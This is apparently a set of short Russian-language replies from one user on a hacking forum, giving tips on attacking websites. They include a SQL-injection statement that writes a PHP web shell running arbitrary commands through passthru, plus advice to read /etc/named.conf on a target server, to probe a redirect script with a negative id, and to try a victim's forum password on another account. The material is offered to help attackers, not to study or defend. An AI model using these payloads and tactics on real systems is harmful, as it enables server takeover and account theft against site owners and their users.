Separate names with a comma.
Да незашто =)
Так попробуй /**/
Да поступок красивый, но я бы так не смог =)
У тебя талант =)
Там есть домашняя директория юзера apach но наивно палагать что тебе можно читать httpd.conf посмотри лучше в /etc/named.conf сопоставь с...
ИМХО проще отображать в обратном порядке чем писать в начало
INSERT INTO `shell` values ('<? passthru("$cmd"); ?>'); замени на INSERT INTO `s` values ('<? passthru("$cmd"); ?>');
Нет прав на доступ к базе mysql .
HTTP Splitting это не обязательно XSS эта модификация HTTP запроса А как ты это использушь дело твоё.
судя по всему скрипт из базы выдирает урл по id для редиректа сделай отрицательный id -1 и дальше исследуй . Возможно присутствует HTTP...
Ковычки могут понадобиться для того чтоб закрыть тег =) Автор поясни какого типа XSS актив пасив мыло форум и т.д
попробуй пороль от акаунта на форуме
однозначно nerezus =))
![K[o]S](data/avatars/s/18/18223.jpg?1427794545){kind=small}
